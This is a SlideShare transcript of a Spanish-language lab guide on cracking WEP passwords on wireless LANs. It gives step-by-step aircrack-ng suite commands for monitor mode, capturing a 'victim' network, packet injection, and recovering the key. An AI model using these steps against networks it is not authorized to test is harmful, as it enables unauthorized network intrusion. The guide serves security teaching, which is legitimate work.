Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Laboratorio hacking de contraseñas wep en redes wlan

2,088 views

Published on

Published in: Education
  • Be the first to comment

  • Be the first to like this

Laboratorio hacking de contraseñas wep en redes wlan

  1. 1. Laboratorio Hacking de Contraseñas WEP en Redes WLANDuración60 MinutosRequisitos 1. Computador con Tarjeta de Red Wireless LAN. 2. Sistema Operativo GNU/Linux (Recomendación Backtrack). Valido en entorno de Virtualización 3. Aplicativos Instalados: aircrack-ng, macchanger.Nota: Si se hace uso de un entorno de virtualización se requiere de un adaptador Wireless LANUSB. Dado que las maquinas virtuales crean sus adaptadores de red como interfaces Ethernet.Desarrollo 1. Comprobar el nombre de los adaptadores de Red Inalámbricos, con: iwconfig o airmon-ng 2. Iniciar el modo monitor en la interfaz de red Wlan0 con el comando airmon-ng start wlan0 3. Ya tenemos nuestra tarjeta en Modo Monitor,"mon0" es el nombre de la interfaz en modo monitor. 4. Iniciarnos el proceso de escanear redes disponibles con el siguiente comando: airodump-ng mon0 5. Esto comenzará a mostrarnos las Redes Disponibles. Seleccionamos el BSSID de la red victima. 6. En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando: airodump-ng -w redes -c 11 --bssid 00:22:A4:30E:59 mon0 (La MAC presentada es ejemplo) donde, -w = especifica el nombre del archivo donde se guarda la captura de datos -c = especifica el canal de la Red --bssid = especifica Mac de Punto de Acceso mon0 = especifica la interfaz de la tarjeta de Red en Modo Monitor 7. Abrimos una segunda terminal (sin cerrar la primera) y escribimos lo siguiente: aireplay-ng -1 0 -a 00:22:A4:30E:59 mon0 Esto es para asociar su pc con la Red Víctima 8. Inyectamos paquetes a la red victima, para esto tecleamos lo siguiente: aireplay-ng -3 -b 00:22:A4:30E:59 mon0 Jesse Padilla Agudelo http://arpanetblog.com
  2. 2. Con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rápidamente, y esperamos a que llegue a los 30000 datos para poder descifrar la contraseña.9. Cuando llegue a los 30,000 datos abrimos una tercera y última terminal y escribimos el comando: aircrack-ng redes-01.cap redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 6 presionamos enter y aircrack nos presentara la llave Wep descifrada10. Key Found¡ (09:86:23:47:63)Nota: Si en algún punto requerimos especificar el canal para la interfaz mon0 lo hacemos conel comando airmon-ng start wlan0 –chanel # Jesse Padilla Agudelo http://arpanetblog.com

×